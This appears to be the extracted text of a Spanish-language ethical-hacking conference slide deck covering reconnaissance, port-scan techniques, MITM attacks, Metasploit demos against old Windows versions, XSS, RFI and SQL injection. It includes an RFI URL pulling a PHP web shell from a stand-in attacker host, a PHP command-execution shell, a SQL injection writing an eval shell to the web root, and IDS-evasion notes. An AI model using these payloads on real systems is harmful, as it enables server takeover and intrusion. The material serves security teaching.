Upload
n3xasec
View
3.287
Download
1
Embed Size (px)
Citation preview
Técnicas avanzadas de penetración a sistemas
Ponente: Rafael Gómez Del Ángel
Aka : NoSfEr@tU
HACKING ETICOLos hackers éticos son profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.
QUE ES UN HACKER
Experto en algún campo de la informática Conocimientos profundos de diversas
Plataformas (Windows, Unix, Linux, android). Conocimientos de redes Conocimientos de hardware y software.
Pasos previos al ATAQUE
1. Reconocimiento• Pasivo• Activo2. Rastreo (escaner)3. Acceso• Niveles del Sistema• Redes• DOS4. Mantener el
acceso5. Borrado de
huellas
FOOTPRINTING
Obtención de los perfiles de seguridad de una organización haciendo uso de una metodología (footprinting).
El resultado del footprinting es un perfil único de la organización en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.
FOOTPRINTING
1.- Obtener información inicial• whois• nslookup2.- Localizar el rango de red• Traceroute
TIPOS DE ATAQUES
1.- Hacking WIFI2.-DOS3.-DDOS4.-M.I.T5.- Envenenamiento DNS6.-Reverse Shell7.-Port scaning
8.-Inyecciones SQL9.-R.F.I10.-XSS11.-Inyeccion de comandos arbitrarios12.-Hijacking13.-Cookie poisoning
Hacking Wifi
Escaneo de Puertos
El escaneo de puertos es el ataque primario y mas común utilizado en una auditoria ya sea legal o ilegal.Nos permite :ExplorarIdentificarComprender
Técnicas
TCP connect ()
Reverse Ident
TCP SYN
Zombie scan
TCP FIN
ACK Scan
Null Scan
Xmas Scan
SYN/ACK Scan
Fragmentación TCP
TCP echo
UDP echo
TCP ACK
TCP SYN
ICMP echo
UDP scan
FTP bounce
scan
AbiertoMedio abierto Silencioso Barridos Otros
Tipo de escaneo
TCP connect()La mas común de cualquier software de escaneo de puertosconsiste en usar la llamada connect() de TCP
Intenta establecer conexiónSi conecta el puerto esta abiertosi no , el puerto esta cerradoSi no contesta esta silencioso
Muy rápido e invasivo y llamativo en exceso. * Miles de conexiones*Logs
ComportamientoTCP connect()
Hacker-------[SYN]------>[0] Puerto TCP Victima OPENHacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPENHacker-------[ACK]------->[0] Puerto TCP Victima OPEN
Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSEDHacker<-----[RST]-------[X] Puerto TCP Victima CLOSED
Hacker------[SYN]-------[*] Puerto TCP Victima SILENT
TCP SYNTécnica conocida como Half-open scan, escaneo medio abierto por excelenciase envía un paquete SYN fingiendo establecer una conexion y se espera la respuesta del Host, si llega un paquete SYN/ACK significa que esta abierto y no devolvemos la contestación ACK, devolvemos RST , esto para evitar que se complete el inicio de conexión y así burlar el registro del sistema como intento de conexión
*Discreto*Excelentes resultados
ComportamientoTCP SYN
Hacker ---[SYN]---> [O] P. TCP abierto en la VictimaHacker <---[SYN/ACK]--- [O] P. TCP abierto en la VictimaHacker ---[RST]---> [O] P. TCP abierto en la Victima
Hacker ---[SYN]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la Victima
Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima
ACK scanDestinado a identificar aquellos puertos que están en estado silencioso de forma precisa cuando un puerto esta en este estado o no.Envía paquetes ACK con números de secuencia y confirmación aleatorios.si el puerto esta abierto, responderá con un paquete RST, pues no identificara la conexión como suyasi el puerto esta cerrado responderá RST pero si no responde es que esta filtrado.* Apoyo de un escaneo anterior*Variable del ping si responde RST esta vivo si no es in alcanzable.*Identificar firewall bloqueando SYN.
ComportamientoACK scan
Hacker ---[ACK]---> [O] Puerto TCP abierto en la VictimaHacker <---[RST]--- [O] Puerto TCP abierto en la Victima
Hacker ---[ACK]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la Victima
Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima
Null scan
Similar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con los flags desactivados, si el puerto esta cerrado nos responderá con RST y En caso de no recibir nada el puerto esta abierto o silencioso.
Ciertos firewalls vigilan los paquetes de finalización aquí hace lo que FIN no.
ComportamientoNull scan
Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima
local ---[ ]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la Victima
Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima
La razón
POC Analizar 2 tipos de escaneo con la intención de evadir un firewall y obtener información acerca de los puertos abiertos.
Ataques MIT1. DNS cache poisoning2. ARP Poisoning3. Phishing4. Sslstrip
EXPLOTACION
Escáner de vulnerabilidades
Escáner de vulnerabilidades
EXPLOTACION
MetasploitWindows Server 2003
PenetraciónWindows Server 2003prueba de concepto
Puerto 4451. ms080672. Crear usuario3. Habilitar Escritorio Remoto4. Cambiar la contraseña del Administrador
OBJETIVOMostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.
MetasploitWindows Server 2008 R2
MetasploitWindows Server 2008 R2
•Numero de vulnerabilidad : ms09050•Encontrar el servidor verificando versión de smb•Explotar la vulnerabilidad •Denegación de servicios.
OBJETIVOMostrar el ataque de Denegación de servicios a Windows server 2008 en un ambiente controlado.
MetasploitWindows XP SP3
MetasploitPenetración a Windows XP SP3
Prueba de concepto
1. Encontrar la victima verificando versión de SMB2. Lograr la obtención de una reverse shell 3. Habilitar el uso de escritorio remoto4. Inyectar la conexión a escritorio remoto
OBJETIVOMostrar el ataque de penetración a windows XP sp3 en un ambiente controlado.
MetasploitWindows 7
MetasploitWindows 7 Penetración
Prueba de concepto
1. Usar INGENIERIA SOCIAL
2. Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL
3. Vulnerar navegador web.
4. UPLOAD MI PATH C:\DESTINO\\Downloads
OBJETIVOMostrar el ataque de penetración a windows 7 en un ambiente controlado.
Ataques WEB
Ataques XSSAnalicemos la vulnerabilidad de xss
Es una vulnerabilidad de grado medio alto ya que con estos ataques será posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador
Ataques XSS
Ataques XSS
Ataques XSS
Ataques RFIRemote file
inclusionvulnerabilidad que afecta únicamente a paginas dinámicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto.
RFI se aprovecha del uso irresponsable de lasfunciones include y requiere, las cuales, debido al limitado conocimiento del programador ylas pocas o nulas validaciones que realiza antes de incluir una variable recibida porparametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scriptsprogramados para explotar dicha vulnerabilidad.
Ataques RFIRemote file
inclusionhttp://www.victima.com/index.php?nav=pagina1phphttp://www.victimacom/index.php?nav=pagina2.php
<?phpprint system($_GET['command']);?>
http://www.victima.com/index.php?nav=http://atacante.com/shell.txt&command=ls
Inyeccion SQL
union all select "<?php eval($_GET['exec']); ?>",2,3,4into outfile"/var/www/html/exec.php"
Analicemos este código
<?php$link = mysql_connect('127.0.0.1','root', 'pass');mysql_select_db('ejemplo', $link);$sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link);if(mysql_errno($link)){ echo mysql_error($link);exit;}while($row = mysql_fetch_assoc($sql)){ echo $row['id']."".$row['titulo']."".$row['contenido']."".$row['parent'];}?>
Busqueda de tablas.
Evacion de IDS
El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una combinación de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una combinación de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
Char double encode
El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una combinación de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
Space 2 mssql blank
Prueba de concepto
OBJETIVOMostrar el ataque de inyección SQL y el dumpeo de la BD. en un ambiente controlado.
GRACIAS
Ponente: Rafael Gómez Del Ángel Aka : NoSfEr@tU